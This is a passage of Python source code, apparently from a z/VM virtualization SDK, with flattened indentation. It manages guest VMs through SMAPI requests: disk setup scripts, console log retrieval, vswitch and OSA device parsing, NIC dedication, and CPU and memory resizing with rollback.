LOG.error("Failed to punch file to userid '%s',"
"error: %s" % (userid, err.format_message()))
raise
finally:
os.remove(fn)
def get_guest_connection_status(self, userid):
'''Get guest vm connection status.'''
rd = ' '.join(('getvm', userid, 'isreachable'))
results = self._request(rd)
if results['rs'] == 1:
return True
else:
return False
def _generate_disk_parmline(self, vdev, fmt, mntdir):
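"""Build the single-quoted parm string ('action=addMdisk vaddr=<vdev> filesys=<fmt> mntdir=<mntdir>') passed to the setupDisk handler."""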
parms = [
'action=' + 'addMdisk',
'vaddr=' + vdev,
'filesys=' + fmt,
'mntdir=' + mntdir
]
parmline = ' '.join(parms)
parmstr = "'" + parmline + "'"
return parmstr
def process_additional_minidisks(self, userid, disk_info):
'''Generate and punch the scripts used to process additional disk into
target vm's reader.
'''
for idx, disk in enumerate(disk_info):
vdev = disk.get('vdev') or self.generate_disk_vdev(
offset = (idx + 1))
fmt = disk.get('format')
mount_dir = disk.get('mntdir') or ''.join(['/mnt/ephemeral',
str(vdev)])
# the mount point of swap partition is swap
if fmt == "swap":
mount_dir = "swap"
disk_parms = self._generate_disk_parmline(vdev, fmt, mount_dir)
func_name = '/var/lib/zvmsdk/setupDisk'
self.aemod_handler(userid, func_name, disk_parms)
# trigger do-script
if self.get_power_state(userid) == 'on':
self.execute_cmd(userid, "/usr/bin/zvmguestconfigure start")
def aemod_handler(self, instance_name, func_name, parms):
rd = ' '.join(['changevm', instance_name, 'aemod', func_name,
'--invparms', parms])
action = parms[0] + instance_name
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_user_console_output(self, userid):
# get console into reader
rd = 'getvm %s consoleoutput' % userid
action = 'get console log reader file list for guest vm: %s' % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
resp = self._request(rd)
with zvmutils.expect_invalid_resp_data(resp):
rf_list = resp['response'][0].rpartition(':')[2].strip().split()
# TODO: make sure reader device is online
# via 'cat /sys/bus/ccw/drivers/vmur/0.0.000c/online'
# 'sudo /sbin/cio_ignore -r 000c; sudo /sbin/chccwdev -e 000c'
# 'which udevadm &> /dev/null && udevadm settle || udevsettle'
logs = []
for rf in rf_list:
cmd = 'sudo /usr/sbin/vmur re -t -O %s' % rf
rc, output = zvmutils.execute(cmd)
if rc == 0:
logs.append(output)
return ''.join(logs)
def query_vswitch(self, switch_name):
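"""Query vswitch details via Virtual_Network_Vswitch_Query_Extended and parse the response into a dict with the basic info plus 'real_devices', 'authorized_users' and 'adapters'."""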
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Query_Extended" %
smt_userid,
"--operands",
'-k switch_name=%s' % switch_name
))
try:
results = self._request(rd)
rd_list = results['response']
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 212) and (err.results['rs'] == 40)):
msg = 'Vswitch %s does not exist' % switch_name
LOG.error(msg)
obj_desc = "Vswitch %s" % switch_name
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
else:
action = "query vswitch details info"
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
vsw_info = {}
with zvmutils.expect_invalid_resp_data():
# ignore user_vlan_id part and jump to the vswitch basic info
idx_end = len(rd_list)
idx = 0
while((idx < idx_end) and
not rd_list[idx].__contains__('switch_name')):
idx = idx + 1
# The next 21 lines contain the vswitch basic info
# eg, name, type, port_type, vlan_awareness, etc
for i in range(21):
rd = rd_list[idx + i].split(':')
vsw_info[rd[0].strip()] = rd[1].strip()
idx = idx + 21
# Skip the vepa_status
while((idx < idx_end) and
not rd_list[idx].__contains__('real_device_address') and
not rd_list[idx].__contains__('port_num') and
not rd_list[idx].__contains__('adapter_owner')):
idx = idx + 1
def _parse_value(data_list, idx, keyword, offset=1):
value = data_list[idx].rpartition(keyword)[2].strip()
if value == '(NONE)':
value = 'NONE'
return idx + offset, value
def _parse_dev_status(value):
if value in const.DEV_STATUS.keys():
return const.DEV_STATUS[value]
else:
return 'Unknown'
def _parse_dev_err(value):
if value in const.DEV_ERROR.keys():
return const.DEV_ERROR[value]
else:
return 'Unknown'
# Start to analyse the real devices info
vsw_info['real_devices'] = {}
while((idx < idx_end) and
rd_list[idx].__contains__('real_device_address')):
# each rdev has 6 lines' info
idx, rdev_addr = _parse_value(rd_list, idx,
'real_device_address: ')
idx, vdev_addr = _parse_value(rd_list, idx,
'virtual_device_address: ')
idx, controller = _parse_value(rd_list, idx,
'controller_name: ')
idx, port_name = _parse_value(rd_list, idx, 'port_name: ')
idx, dev_status = _parse_value(rd_list, idx,
'device_status: ')
idx, dev_err = _parse_value(rd_list, idx,
'device_error_status ')
vsw_info['real_devices'][rdev_addr] = {'vdev': vdev_addr,
'controller': controller,
'port_name': port_name,
'dev_status':
_parse_dev_status(
dev_status),
'dev_err': _parse_dev_err(
dev_err)
}
# Under some case there would be an error line in the output
# "Error controller_name is NULL!!", skip this line
if ((idx < idx_end) and
rd_list[idx].__contains__(
'Error controller_name is NULL!!')):
idx += 1
# Start to get the authorized userids
vsw_info['authorized_users'] = {}
while((idx < idx_end) and rd_list[idx].__contains__('port_num')):
# each authorized userid has 6 lines' info at least
idx, port_num = _parse_value(rd_list, idx,
'port_num: ')
idx, userid = _parse_value(rd_list, idx,
'grant_userid: ')
idx, prom_mode = _parse_value(rd_list, idx,
'promiscuous_mode: ')
idx, osd_sim = _parse_value(rd_list, idx, 'osd_sim: ')
idx, vlan_count = _parse_value(rd_list, idx,
'vlan_count: ')
vlan_ids = []
for i in range(int(vlan_count)):
idx, id = _parse_value(rd_list, idx,
'user_vlan_id: ')
vlan_ids.append(id)
# For a vlan unaware vswitch, the smcli query would
# return vlan_count as 1; here we just set the count to 0
if (vsw_info['vlan_awareness'] == 'UNAWARE'):
vlan_count = 0
vlan_ids = []
vsw_info['authorized_users'][userid] = {
'port_num': port_num,
'prom_mode': prom_mode,
'osd_sim': osd_sim,
'vlan_count': vlan_count,
'vlan_ids': vlan_ids
}
# Start to get the connected adapters info
# OWNER_VDEV would be used as the dict key for each adapter
vsw_info['adapters'] = {}
while((idx < idx_end) and
rd_list[idx].__contains__('adapter_owner')):
# each adapter has four lines of info: owner, vdev, macaddr, type
idx, owner = _parse_value(rd_list, idx,
'adapter_owner: ')
idx, vdev = _parse_value(rd_list, idx,
'adapter_vdev: ')
idx, mac = _parse_value(rd_list, idx,
'adapter_macaddr: ')
idx, type = _parse_value(rd_list, idx, 'adapter_type: ')
key = owner + '_' + vdev
vsw_info['adapters'][key] = {
'mac': mac,
'type': type
}
# Todo: analyze and add the uplink NIC info and global member info
def _parse_switch_status(value):
if value in const.SWITCH_STATUS.keys():
return const.SWITCH_STATUS[value]
else:
return 'Unknown'
if 'switch_status' in vsw_info.keys():
vsw_info['switch_status'] = _parse_switch_status(
vsw_info['switch_status'])
return vsw_info
def get_nic_info(self, userid=None, nic_id=None, vswitch=None):
nic_info = self._NetDbOperator.switch_select_record(userid=userid,
nic_id=nic_id, vswitch=vswitch)
return nic_info
def is_first_network_config(self, userid):
action = "get guest '%s' to database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
info = self._GuestDbOperator.get_guest_by_userid(userid)
# check net_set
if int(info[3]) == 0:
return True
else:
return False
def update_guestdb_with_net_set(self, userid):
action = "update guest '%s' in database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._GuestDbOperator.update_guest_by_userid(userid, net_set='1')
def _is_OSA_free(self, OSA_device):
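"""Return True only when the OSA device and the next two consecutive addresses are all in the FREE list reported by _query_OSA."""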
osa_info = self._query_OSA()
if 'OSA' not in osa_info.keys():
return False
elif len(osa_info['OSA']['FREE']) == 0:
return False
else:
dev1 = str(OSA_device).zfill(4).upper()
dev2 = str(str(hex(int(OSA_device, 16) + 1))[2:]).zfill(4).upper()
dev3 = str(str(hex(int(OSA_device, 16) + 2))[2:]).zfill(4).upper()
if ((dev1 in osa_info['OSA']['FREE']) and
(dev2 in osa_info['OSA']['FREE']) and
(dev3 in osa_info['OSA']['FREE'])):
return True
else:
return False
def _query_OSA(self):
smt_userid = zvmutils.get_smt_userid()
rd = "SMAPI %s API Virtual_Network_OSA_Query" % smt_userid
OSA_info = {}
try:
results = self._request(rd)
rd_list = results['response']
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 4) and (err.results['rs'] == 4)):
msg = 'No OSAs on system'
LOG.info(msg)
return OSA_info
else:
action = "query OSA details info"
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
with zvmutils.expect_invalid_resp_data():
idx_end = len(rd_list)
idx = 0
def _parse_value(data_list, idx, keyword, offset=1):
value = data_list[idx].rpartition(keyword)[2].strip()
return idx + offset, value
# Start to analyse the osa devices info
while((idx < idx_end) and
rd_list[idx].__contains__('OSA Address')):
idx, osa_addr = _parse_value(rd_list, idx,
'OSA Address: ')
idx, osa_status = _parse_value(rd_list, idx,
'OSA Status: ')
idx, osa_type = _parse_value(rd_list, idx,
'OSA Type: ')
if osa_type != 'UNKNOWN':
idx, CHPID_addr = _parse_value(rd_list, idx,
'CHPID Address: ')
idx, Agent_status = _parse_value(rd_list, idx,
'Agent Status: ')
if osa_type not in OSA_info.keys():
OSA_info[osa_type] = {}
OSA_info[osa_type]['FREE'] = []
OSA_info[osa_type]['BOXED'] = []
OSA_info[osa_type]['OFFLINE'] = []
OSA_info[osa_type]['ATTACHED'] = []
if osa_status.__contains__('ATT'):
id = osa_status.split()[1]
item = (id, osa_addr)
OSA_info[osa_type]['ATTACHED'].append(item)
else:
OSA_info[osa_type][osa_status].append(osa_addr)
return OSA_info
def _get_available_vdev(self, userid, vdev=None):
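"""Return a free NIC vdev for the guest: the default or requested vdev when no NIC is defined yet; otherwise the highest used vdev plus 3, or the requested vdev after validation."""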
ports_info = self._NetDbOperator.switch_select_table()
vdev_info = []
for p in ports_info:
if p['userid'] == userid.upper():
vdev_info.append(p['interface'])
if len(vdev_info) == 0:
# no nic defined for the guest
if vdev is None:
nic_vdev = CONF.zvm.default_nic_vdev
else:
nic_vdev = vdev
else:
if vdev is None:
used_vdev = max(vdev_info)
nic_vdev = str(hex(int(used_vdev, 16) + 3))[2:]
else:
if self._is_vdev_valid(vdev, vdev_info):
nic_vdev = vdev
else:
errmsg = ("The specified virtual device number %s "
"has already been used." % vdev)
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
if ((len(nic_vdev) > 4) or
(len(str(hex(int(nic_vdev, 16) + 2))[2:]) > 4)):
errmsg = ("Virtual device number %s is not valid" % nic_vdev)
raise exception.SDKInvalidInputFormat(msg=errmsg)
return nic_vdev
def dedicate_OSA(self, userid, OSA_device, vdev=None, active=False):
nic_vdev = self._get_available_vdev(userid, vdev=vdev)
if not self._is_OSA_free(OSA_device):
errmsg = ("The specified OSA device number %s "
"is not free" % OSA_device)
raise exception.SDKConflictError(modID='network', rs=14,
osa=OSA_device, userid=userid,
msg=errmsg)
LOG.debug('Nic attributes: vdev is %(vdev)s, '
'dedicated OSA device is %(osa)s',
{'vdev': nic_vdev,
'osa': OSA_device})
self._dedicate_OSA(userid, OSA_device, nic_vdev, active=active)
return nic_vdev
def _dedicate_OSA_inactive_exception(self, error, userid, vdev,
OSA_device):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=15,
osa=OSA_device, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKConflictError(modID='network', rs=15,
osa=OSA_device, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 4)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=14,
osa=OSA_device, userid=userid,
msg=errmsg)
else:
raise error
def _dedicate_OSA_active_exception(self, error, userid, OSA_device):
if (((error.results['rc'] == 204) and (error.results['rs'] == 4)) or
((error.results['rc'] == 204) and (error.results['rs'] == 8)) or
((error.results['rc'] == 204) and (error.results['rs'] == 16))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=14,
osa=OSA_device, userid=userid,
msg=errmsg)
else:
raise error
def _dedicate_OSA(self, userid, OSA_device, vdev, active=False):
if active:
self._is_active(userid)
msg = ('Start to dedicate nic device %(vdev)s of guest %(vm)s '
'to OSA device %(osa)s'
% {'vdev': vdev, 'vm': userid, 'osa': OSA_device})
LOG.info(msg)
def_vdev = vdev
att_OSA_device = OSA_device
for i in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Dedicate_DM' %
userid,
"--operands",
"-v %s" % def_vdev,
"-r %s" % att_OSA_device))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
LOG.error("Failed to dedicate OSA %s to nic %s for user %s "
"in the guest's user direct, error: %s" %
(att_OSA_device, def_vdev, userid,
err.format_message()))
# TODO revoke the dedicated OSA in user direct
while (int(def_vdev, 16) != int(vdev, 16)):
def_vdev = str(hex(int(def_vdev, 16) - 1))[2:]
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate_DM' %
userid,
"--operands",
"-v %s" % def_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
if ((err2.results['rc'] == 404) and
(err2.results['rs'] == 8)):
pass
else:
LOG.error("Failed to Undedicate nic %s for user"
" %s in the guest's user direct, "
"error: %s" %
(def_vdev, userid,
err2.format_message()))
pass
self._dedicate_OSA_inactive_exception(err, userid, vdev,
OSA_device)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
att_OSA_device = str(hex(int(att_OSA_device, 16) + 1))[2:]
if active:
def_vdev = vdev
att_OSA_device = OSA_device
for i in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Dedicate' %
userid,
"--operands",
"-v %s" % def_vdev,
"-r %s" % att_OSA_device))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
LOG.error("Failed to dedicate OSA %s to nic %s for user "
"%s on the active guest system, error: %s" %
(att_OSA_device, def_vdev, userid,
err.format_message()))
# TODO revoke the dedicated OSA in user direct and active
detach_vdev = vdev
for j in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate_DM' %
userid,
"--operands",
"-v %s" % detach_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
if ((err2.results['rc'] == 404) and
(err2.results['rs'] == 8)):
pass
else:
LOG.error("Failed to Undedicate nic %s for "
"user %s in the guest's user "
"direct, error: %s" %
(def_vdev, userid,
err2.format_message()))
pass
detach_vdev = str(hex(int(detach_vdev, 16) + 1))[2:]
while (int(def_vdev, 16) != int(vdev, 16)):
def_vdev = str(hex(int(def_vdev, 16) - 1))[2:]
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate' %
userid,
"--operands",
"-v %s" % def_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err3:
if ((err3.results['rc'] == 204) and
(err3.results['rs'] == 8)):
pass
else:
LOG.error("Failed to Undedicate nic %s for "
"user %s on the active guest "
"system, error: %s" %
(def_vdev, userid,
err3.format_message()))
pass
self._dedicate_OSA_active_exception(err, userid,
OSA_device)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
att_OSA_device = str(hex(int(att_OSA_device, 16) + 1))[2:]
OSA_desc = 'OSA=%s' % OSA_device
self._NetDbOperator.switch_add_record(userid, vdev, comments=OSA_desc)
msg = ('Dedicate nic device %(vdev)s of guest %(vm)s '
'to OSA device %(osa)s successfully'
% {'vdev': vdev, 'vm': userid, 'osa': OSA_device})
LOG.info(msg)
def _undedicate_nic_active_exception(self, error, userid, vdev):
if ((error.results['rc'] == 204) and (error.results['rs'] == 44)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=16,
userid=userid, vdev=vdev,
msg=errmsg)
else:
raise error
def _undedicate_nic_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=17,
userid=userid, vdev=vdev,
obj=obj_desc)
else:
raise error
def _undedicate_nic(self, userid, vdev, active=False,
del_active_only=False):
if active:
self._is_active(userid)
msg = ('Start to undedicate nic device %(vdev)s of guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
if not del_active_only:
def_vdev = vdev
for i in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate_DM' %
userid,
"--operands",
"-v %s" % def_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 404) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist in "
"the guest's user direct", vdev)
else:
LOG.error("Failed to undedicate nic %s for %s in "
"the guest's user direct, error: %s" %
(vdev, userid, emsg))
self._undedicate_nic_inactive_exception(err, userid, vdev)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
self._NetDbOperator.switch_delete_record_for_nic(userid, vdev)
if active:
def_vdev = vdev
for i in range(3):
rd = ' '.join((
"SMAPI %s API Image_Device_Undedicate" %
userid,
"--operands",
'-v %s' % def_vdev))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 204) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist on "
"the active guest system", vdev)
else:
LOG.error("Failed to undedicate nic %s for %s on "
"the active guest system, error: %s" %
(vdev, userid, emsg))
self._undedicate_nic_active_exception(err, userid,
vdev)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
msg = ('Undedicate nic device %(vdev)s of guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def _request_with_error_ignored(self, rd):
"""Send smt request, log and ignore any errors."""
try:
return self._request(rd)
except Exception as err:
# log as warning and ignore namelist operation failures
LOG.warning(six.text_type(err))
def namelist_add(self, namelist, userid):
rd = ''.join(("SMAPI %s API Name_List_Add " % namelist,
"--operands -n %s" % userid))
self._request_with_error_ignored(rd)
def namelist_remove(self, namelist, userid):
rd = ''.join(("SMAPI %s API Name_List_Remove " % namelist,
"--operands -n %s" % userid))
self._request_with_error_ignored(rd)
def namelist_query(self, namelist):
rd = "SMAPI %s API Name_List_Query" % namelist
resp = self._request_with_error_ignored(rd)
if resp is not None:
return resp['response']
else:
return []
def namelist_destroy(self, namelist):
rd = "SMAPI %s API Name_List_Destroy" % namelist
self._request_with_error_ignored(rd)
def _get_defined_cpu_addrs(self, userid):
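"""Return (max_cpus, defined_addrs): the MACHINE ESA maximum and the CPU addresses currently defined in the user directory."""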
user_direct = self.get_user_direct(userid)
defined_addrs = []
max_cpus = 0
for ent in user_direct:
if ent.startswith("CPU"):
cpu_addr = ent.split()[1].strip().upper()
defined_addrs.append(cpu_addr)
if ent.startswith("MACHINE ESA"):
max_cpus = int(ent.split()[2].strip())
return (max_cpus, defined_addrs)
def _get_available_cpu_addrs(self, used_addrs, max_cpus):
# Get available CPU addresses that are not defined in user entry
used_set = set(used_addrs)
available_addrs = set([hex(i)[2:].rjust(2, '0').upper()
for i in range(0, max_cpus)])
available_addrs.difference_update(used_set)
return list(available_addrs)
def _get_active_cpu_addrs(self, userid):
# Get the active cpu addrs in two-digit hex string in upper case
# Sample output for 'lscpu --parse=ADDRESS':
# # The following is the parsable format, which can be fed to other
# # programs. Each different item in every column has an unique ID
# # starting from zero.
# # Address
# 0
# 1
active_addrs = []
active_cpus = self.execute_cmd(userid, "lscpu --parse=ADDRESS")
for c in active_cpus:
# Skip the comment lines at beginning
if c.startswith("# "):
continue
addr = hex(int(c.strip()))[2:].rjust(2, '0').upper()
active_addrs.append(addr)
return active_addrs
def resize_cpus(self, userid, count):
# Check defined cpus in user entry. If greater than requested, then
# delete cpus. Otherwise, add new cpus.
# Return value: for revert usage, a tuple of
# action: The action taken for this resize, possible values:
# 0: no action, 1: add cpu, 2: delete cpu
# cpu_addrs: list of influenced cpu addrs
action = 0
updated_addrs = []
(max_cpus, defined_addrs) = self._get_defined_cpu_addrs(userid)
defined_count = len(defined_addrs)
# Check maximum cpu count defined
if max_cpus == 0:
LOG.error("Resize for guest '%s' cannot be done. The maximum "
"number of cpus is not defined in the user directory." %
userid)
raise exception.SDKConflictError(modID='guest', rs=3,
userid=userid)
# Check requested count is less than the maximum cpus
if count > max_cpus:
LOG.error("Resize for guest '%s' cannot be done. The "
"requested number of cpus: '%i' exceeds the maximum "
"number of cpus allowed: '%i'." %
(userid, count, max_cpus))
raise exception.SDKConflictError(modID='guest', rs=4,
userid=userid,
req=count, max=max_cpus)
# Check count and take action
if defined_count == count:
LOG.info("The number of currently defined CPUs in user '%s' equals "
"the requested count: %i, no action for static resize "
"needed." % (userid, count))
return (action, updated_addrs, max_cpus)
elif defined_count < count:
action = 1
# add more CPUs
available_addrs = self._get_available_cpu_addrs(defined_addrs,
max_cpus)
# sort the list and get the first few addrs to use
available_addrs.sort()
# Define new cpus in user directory
rd = ''.join(("SMAPI %s API Image_Definition_Update_DM " % userid,
"--operands"))
updated_addrs = available_addrs[0:count - defined_count]
for addr in updated_addrs:
rd += (" -k CPU=CPUADDR=%s" % addr)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as e:
msg = ("Define new cpus in user directory for '%s' failed with"
" SMT error: %s" % (userid, e.format_message()))
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=6, userid=userid,
err=e.format_message())
LOG.info("New CPUs defined in user directory for '%s' "
"successfully" % userid)
return (action, updated_addrs, max_cpus)
else:
action = 2
# Delete CPUs
defined_addrs.sort()
updated_addrs = defined_addrs[-(defined_count - count):]
# Delete the last few cpus in user directory
rd = ''.join(("SMAPI %s API Image_Definition_Delete_DM " % userid,
"--operands"))
for addr in updated_addrs:
rd += (" -k CPU=CPUADDR=%s" % addr)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as e:
msg = ("Delete CPUs in user directory for '%s' failed with"
" SMT error: %s" % (userid, e.format_message()))
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=6, userid=userid,
err=e.format_message())
LOG.info("CPUs '%s' deleted from user directory for '%s' "
"successfully" % (str(updated_addrs), userid))
return (action, updated_addrs, max_cpus)
def live_resize_cpus(self, userid, count):
# Get active cpu count and compare with requested count
# If request count is smaller than the current count, then report
# error and exit immediately.
active_addrs = self._get_active_cpu_addrs(userid)
active_count = len(active_addrs)
if active_count > count:
LOG.error("Failed to live resize cpus of guest: %(uid)s, "
"current active cpu count: %(cur)i is greater than "
"the requested count: %(req)i." %
{'uid': userid, 'cur': active_count,
'req': count})
raise exception.SDKConflictError(modID='guest', rs=2,
userid=userid,
active=active_count,
req=count)
# Static resize CPUs. (add or delete CPUs from user directory)
(action, updated_addrs, max_cpus) = self.resize_cpus(userid, count)
if active_count == count:
# active count equals to requested
LOG.info("Current active cpu count of guest: '%s' equals the "
"requested count: '%i', no more actions needed for "
"live resize." % (userid, count))
LOG.info("Live resize cpus for guest: '%s' finished successfully."
% userid)
return
else:
# Get the number of cpus to add to active and check address
active_free = self._get_available_cpu_addrs(active_addrs,
max_cpus)
active_free.sort()
active_new = active_free[0:count - active_count]
# Do live resize
# Define new cpus
cmd_str = "vmcp def cpu " + ' '.join(active_new)
try:
self.execute_cmd(userid, cmd_str)
except exception.SDKSMTRequestFailed as err1:
# rollback and return
msg1 = ("Define cpu of guest: '%s' to active failed with "
"error: %s." % (userid, err1.format_message()))
# Start to do rollback
if action == 0:
LOG.error(msg1)
else:
LOG.error(msg1 + (" Will revert the user directory "
"change."))
# Combine influenced cpu addrs
cpu_entries = ""
for addr in updated_addrs:
cpu_entries += (" -k CPU=CPUADDR=%s" % addr)
rd = ''
if action == 1:
# Delete added CPUs
rd = ''.join(("SMAPI %s API Image_Definition_Delete_DM"
% userid, " --operands"))
else:
# Add deleted CPUs
rd = ''.join(("SMAPI %s API Image_Definition_Create_DM"
% userid, " --operands"))
rd += cpu_entries
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err2:
msg = ("Failed to revert user directory change for '"
"%s', SMT error: %s" % (userid,
err2.format_message()))
LOG.error(msg)
else:
LOG.info("Revert user directory change for '%s' "
"successfully." % userid)
# Finally raise the exception
raise exception.SDKGuestOperationError(
rs=7, userid=userid, err=err1.format_message())
# Activate successfully, rescan in Linux layer to hot-plug new cpus
LOG.info("Added new CPUs to active configuration of guest '%s'" %
userid)
try:
self.execute_cmd(userid, "chcpu -r")
except exception.SDKSMTRequestFailed as err:
msg = err.format_message()
LOG.error("Rescan cpus to hot-plug newly defined cpus for guest: "
"'%s' failed with error: %s. No rollback is done and you "
"may need to check the status and restart the guest to "
"make the defined cpus online." % (userid, msg))
raise exception.SDKGuestOperationError(rs=8, userid=userid,
err=msg)
LOG.info("Live resize cpus for guest: '%s' finished successfully."
% userid)
def _get_defined_memory(self, userid):
user_direct = self.get_user_direct(userid)
defined_mem = max_mem = reserved_mem = -1
for ent in user_direct:
# u'USER userid password storage max privclass'
if ent.startswith("USER "):
fields = ent.split(' ')
if len(fields) != 6:
# This case should not exist if the target user
# is created by zcc and not updated manually by user
break
defined_mem = int(zvmutils.convert_to_mb(fields[3]))
max_mem = int(zvmutils.convert_to_mb(fields[4]))
# For legacy guests, the reserved memory may not be defined
if ent.startswith("COMMAND DEF STOR RESERVED"):
reserved_mem = int(zvmutils.convert_to_mb(ent.split(' ')[4]))
return (defined_mem, max_mem, reserved_mem, user_direct)
def _replace_user_direct(self, userid, user_entry):
# user_entry can be a list or a string
entry_str = ""
if isinstance(user_entry, list):
for ent in user_entry:
if ent == "":
# skip empty line
continue
else:
entry_str += (ent + '\n')
else:
entry_str = user_entry
tmp_folder = tempfile.mkdtemp()
tmp_user_direct = os.path.join(tmp_folder, userid)
with open(tmp_user_direct, 'w') as f:
f.write(entry_str)
rd = ''.join(("SMAPI %s API Image_Replace_DM " % userid,
"--operands ",
"-f %s" % tmp_user_direct))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err1:
msg = ("Replace definition of guest '%s' failed with "
"SMT error: %s." % (userid, err1.format_message()))
LOG.error(msg)
LOG.debug("Unlocking the user directory.")
rd = ("SMAPI %s API Image_Unlock_DM " % userid)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err2:
# ignore 'not locked' error
if ((err2.results['rc'] == 400) and (
err2.results['rs'] == 24)):
LOG.debug("Guest '%s' unlocked successfully." % userid)
pass
else:
# just print error and ignore this unlock error
msg = ("Unlock definition of guest '%s' failed "
"with SMT error: %s" %
(userid, err2.format_message()))
LOG.error(msg)
else:
LOG.debug("Guest '%s' unlocked successfully." % userid)
# at the end, raise the replace error for upper layer to handle
raise err1
finally:
self._pathutils.clean_temp_folder(tmp_folder)
def _lock_user_direct(self, userid):
rd = ("SMAPI %s API Image_Lock_DM " % userid)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as e:
# ignore the "already locked" error
if ((e.results['rc'] == 400) and (e.results['rs'] == 12)):
LOG.debug("Image is already locked.")
else:
msg = ("Lock definition of guest '%s' failed with"
" SMT error: %s" % (userid, e.format_message()))
LOG.error(msg)
raise e
def resize_memory(self, userid, memory):
# Check defined storage in user entry.
# Update STORAGE and RESERVED accordingly.
size = int(zvmutils.convert_to_mb(memory))
(defined_mem, max_mem, reserved_mem,
user_direct) = self._get_defined_memory(userid)
# Check max memory is properly defined
if max_mem == -1 or reserved_mem == -1:
LOG.error("Memory resize for guest '%s' cannot be done. "
"Failed to get the defined/max/reserved memory size "
"from the user directory." % userid)
raise exception.SDKConflictError(modID='guest', rs=19,
userid=userid)
action = 0
# Make sure requested size is less than the maximum memory size
if size > max_mem:
LOG.error("Memory resize for guest '%s' cannot be done. The "
"requested memory size: '%im' exceeds the maximum "
"size allowed: '%im'." %
(userid, size, max_mem))
raise exception.SDKConflictError(modID='guest', rs=20,
userid=userid,
req=size, max=max_mem)
# check if already satisfy request
if defined_mem == size:
LOG.info("The current defined memory size in user '%s' equals "
"the requested size: %im, no action for memory resize "
"needed." % (userid, size))
return (action, defined_mem, max_mem, user_direct)
else:
# set action to 1 to represent that revert need to be done when
# live resize failed.
action = 1
# get the new reserved memory size
new_reserved = max_mem - size
# prepare the new user entry content
entry_str = ""
for ent in user_direct:
if ent == '':
# Avoid adding an empty line in the entry file
# otherwise Image_Replace_DM would return syntax error.
continue
new_ent = ""
if ent.startswith("USER "):
fields = ent.split(' ')
for i in range(len(fields)):
# update fields[3] to new defined size
if i != 3:
new_ent += (fields[i] + ' ')
else:
new_ent += (str(size) + 'M ')
# remove the last space
new_ent = new_ent.strip()
elif ent.startswith("COMMAND DEF STOR RESERVED"):
new_ent = ("COMMAND DEF STOR RESERVED %iM" % new_reserved)
else:
new_ent = ent
# append this new entry
entry_str += (new_ent + '\n')
# Lock and replace user definition with the new_entry content
try:
self._lock_user_direct(userid)
except exception.SDKSMTRequestFailed as e:
raise exception.SDKGuestOperationError(rs=9, userid=userid,
err=e.format_message())
LOG.debug("User directory Locked successfully for guest '%s' " %
userid)
# Replace user directory
try:
self._replace_user_direct(userid, entry_str)
except exception.SDKSMTRequestFailed as e:
raise exception.SDKGuestOperationError(rs=10,
userid=userid,
err=e.format_message())
# Finally return useful info
return (action, defined_mem, max_mem, user_direct)
def _revert_user_direct(self, userid, user_entry):
# user_entry can be a list or a string
try:
self._lock_user_direct(userid)
except exception.SDKSMTRequestFailed:
# print revert error and return
